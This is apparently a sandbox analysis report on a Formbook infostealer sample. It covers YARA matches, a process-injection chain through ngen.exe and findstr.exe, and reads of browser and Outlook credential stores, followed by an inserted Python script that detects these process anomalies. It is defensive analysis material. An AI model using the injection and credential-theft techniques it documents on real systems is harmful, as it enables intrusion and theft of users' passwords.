Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658567DC0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658557EA0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658569660
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65856FE70
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF6585846E0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF6585EC880
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658576860
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658585060
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF65857B850
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 0_2_00007FF658571930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_004017BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_00402820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_004048A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0042D9C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0041019A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_004101A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_00401230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_00403280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_00416A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_004103C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0040E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_00401C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_004024FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_00402500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05950591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0592D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05947571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0593E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05942446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0588C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058B4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058AC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0589B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_059501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_059481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05880100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058C516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0595B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0593F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_059470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_059503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0589E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0587D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_059312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05930274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058A8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058AFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0588ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0589AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05893D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05941D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05947D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05930CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05880CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05890C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05909C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05891F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05882FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0589CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058D2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058B0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05904F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058A2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05899EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05890E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0595A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05899950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058AB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058A6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058BE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058FD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05892840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0589A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058AFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_05946BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_058CDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0594FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe | Code function: 4_2_0588EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D5AA04_2_058D5AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592DAAC4_2_0592DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593DAC64_2_0593DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05947A464_2_05947A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594FA494_2_0594FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05903A6C4_2_05903A6C
Source: C:\Windows\SysWOW64\findstr.exe Code functions: 7_2_0374A352, 7_2_0367D34C, 7_2_0374132D, 7_2_037503E6, 7_2_0369E3F0, 7_2_036D739A, 7_2_03730274, 7_2_037312ED, 7_2_036AB2C0, 7_2_036952A0, 7_2_036C516C, 7_2_0367F172, 7_2_0375B16B, 7_2_03680100, 7_2_0372A118, 7_2_037481CC, 7_2_0369B1B0, 7_2_037501AA, 7_2_0374F0E0, 7_2_037470E9, 7_2_036970C0, 7_2_0373F0CC, 7_2_03690770, 7_2_036B4750, 7_2_0368C7C0, 7_2_0374F7B0, 7_2_036AC6E0, 7_2_037416CC, 7_2_03747571, 7_2_03690535, 7_2_0372D5B0, 7_2_03750591, 7_2_03681460, 7_2_03742446, 7_2_0374F43F, 7_2_0373E4F6, 7_2_0374FB76, 7_2_0374AB40, 7_2_036CDBF9, 7_2_03746BD7, 7_2_036AFB80, 7_2_03703A6C, 7_2_03747A46, 7_2_0374FA49, 7_2_0373DAC6, 7_2_036D5AA0, 7_2_0372DAAC, 7_2_0368EA80, 7_2_036A6962, 7_2_03699950, 7_2_036AB950, 7_2_036929A0, 7_2_0375A9A6, 7_2_03692840, 7_2_0369A840, 7_2_036938E0, 7_2_036BE8F0, 7_2_036768B8, 7_2_03704F40, 7_2_036B0F30, 7_2_0374FF09, 7_2_0369CFE0, 7_2_03682FC8, 7_2_0374FFB1, 7_2_03691F92, 7_2_03690E59, 7_2_0374EE26, 7_2_0374EEDB, 7_2_03699EB0, 7_2_0374CE93, 7_2_036A2E90, 7_2_03747D73, 7_2_03693D40, 7_2_03741D5A, 7_2_0369AD00, 7_2_0368ADE0, 7_2_036AFDC0, 7_2_036A8DBF, 7_2_03709C32, 7_2_03690C00, 7_2_0374FCF2, 7_2_03680CF2, 7_2_03730CB5
Source: C:\Windows\SysWOW64\findstr.exe Code functions: 7_2_02E51A60, 7_2_02E413A1, 7_2_02E6A4C0, 7_2_02E53580, 7_2_02E4CEC0, 7_2_02E4AF40, 7_2_02E4CCA0, 7_2_02E4CC97
Source: C:\Windows\SysWOW64\findstr.exe Code functions: 7_2_0349A39A, 7_2_0349C06C, 7_2_0349B0D8, 7_2_0349BBB4, 7_2_0349BCD3
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: String function: 00007FF65855D7A0 appears 64 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036C5130 appears 36 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 0367B970 appears 266 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036FEA12 appears 84 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 0370F290 appears 105 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036D7E54 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 0587B970 appears 268 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058D7E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058C5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 0590F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058FEA12 appears 85 times
Source: GJRX21GBj3.exe Binary or memory string: OriginalFilename vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe, 00000000.00000000.2067604251.00007FF658727000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe, 00000000.00000002.2078597874.0000029B99C00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
Source: GJRX21GBj3.exe Static PE information: Section: .rsrc ZLIB complexity 0.9966439773787313
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/1@12/8
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658562B30 LookupPrivilegeValueW, GetCurrentProcess, OpenProcessToken, AdjustTokenPrivileges, GetLastError, CloseHandle, GetLargePageMinimum, VirtualAlloc, GetCurrentProcess, VirtualAllocExNuma
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Temp\H0840I45
Source: GJRX21GBj3.exe Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: findstr.exe, 00000007.00000002.3924355546.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520892415.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520776219.0000000003279000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: GJRX21GBj3.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\GJRX21GBj3.exe File read: C:\Users\user\Desktop\GJRX21GBj3.exe
Source: unknown Process created: C:\Users\user\Desktop\GJRX21GBj3.exe "C:\Users\user\Desktop\GJRX21GBj3.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
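The process tree above is the part of this report a detection engineer can act on without any Formbook-specific signature: a binary on the user's Desktop launches svchost.exe and an argument-less ngen.exe, and a SysWOW64 findstr.exe later spawns Firefox. The following is an added example, not part of the Joe Sandbox report, that encodes those parent/child anomalies as rules over Sysmon-style process-creation records. The records, PIDs and the benign baseline entries are constructed to mirror the tree shown here; the list of injection-host binaries beyond findstr.exe and ngen.exe is an assumption. The directory-name check is a heuristic only: the randomly named binary under Program Files (x86) carries the Joe Security FakeChrome PDB path further down this report, so in this run it is the sandbox's decoy browser rather than a dropped file, and the rule still fires on it.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One Sysmon EID 1 style record (Image, ParentProcessId, CommandLine)."""
    pid: int
    ppid: int
    image: str     # full image path
    cmdline: str   # command line as logged


# Constructed records mirroring the tree in this report; PIDs are invented.
SAMPLE_EVENTS = [
    # benign baseline (constructed): services.exe hosting svchost, ngen run with real arguments
    ProcessEvent(500, 400, r"C:\Windows\System32\services.exe", r"C:\Windows\System32\services.exe"),
    ProcessEvent(600, 500, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k NetworkService"),
    ProcessEvent(800, 400, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe",
                 r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" install Example.dll'),
    # the chain from the report
    ProcessEvent(1100, 0, r"C:\Users\user\Desktop\GJRX21GBj3.exe", r'"C:\Users\user\Desktop\GJRX21GBj3.exe"'),
    ProcessEvent(1200, 1100, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessEvent(1300, 1100, r"C:\Windows\System32\svchost.exe", r'"C:\Windows\System32\svchost.exe"'),
    ProcessEvent(1400, 1100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe",
                 r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"'),
    ProcessEvent(1500, 0,
                 r"C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe",
                 r'"C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe"'),
    ProcessEvent(1600, 1500, r"C:\Windows\SysWOW64\findstr.exe", r'"C:\Windows\SysWOW64\findstr.exe"'),
    ProcessEvent(1700, 1600, r"C:\Program Files\Mozilla Firefox\firefox.exe", r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Windows binaries that turn up as injection hosts; findstr.exe and ngen.exe are the ones in this
# report, the rest are an assumed, non-exhaustive list. None of them should ever launch a browser.
INJECTION_HOSTS = {"findstr.exe", "ngen.exe", "svchost.exe", "explorer.exe", "cmd.exe",
                   "msiexec.exe", "wlanext.exe", "netsh.exe", "cmstp.exe"}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the image path on the command line (handles a quoted path)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.partition(" ")[2]
    return bool(rest.strip())


def in_random_program_files_dir(image: str) -> bool:
    """Heuristic: a vendor directory directly under Program Files that is one long run of letters."""
    vendor_parent, vendor = ntpath.split(ntpath.dirname(image))
    return (vendor_parent.lower().endswith(("\\program files", "\\program files (x86)"))
            and len(vendor) >= 32 and vendor.isalpha())


def flag_process_tree(events):
    """Return sorted (rule, pid) pairs for every record that violates one of the rules."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = _basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = _basename(parent.image) if parent else ""
        if name == "svchost.exe" and parent_name != "services.exe":
            findings.append(("svchost_unexpected_parent", e.pid))
        if name == "ngen.exe" and not has_arguments(e.cmdline):
            findings.append(("ngen_without_arguments", e.pid))   # ngen always takes a verb
        if parent_name in INJECTION_HOSTS and name in BROWSERS:
            findings.append(("system_tool_spawned_browser", e.pid))
        if in_random_program_files_dir(e.image):
            findings.append(("random_program_files_directory", e.pid))
    return sorted(findings)


if __name__ == "__main__":
    for rule, pid in flag_process_tree(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid}")
```

The three structural rules (svchost parent, bare ngen, console tool launching a browser) carry over directly to a Sysmon or EDR query on the Image, ParentImage and CommandLine fields; the directory heuristic is a triage aid and should be scored, not alerted on by itself.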
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Sections loaded: apphelp.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, profapi.dll
Source: C:\Windows\SysWOW64\findstr.exe Sections loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: GJRX21GBj3.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: GJRX21GBj3.exe Static file information: File size 1951744 > 1048576
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: GJRX21GBj3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
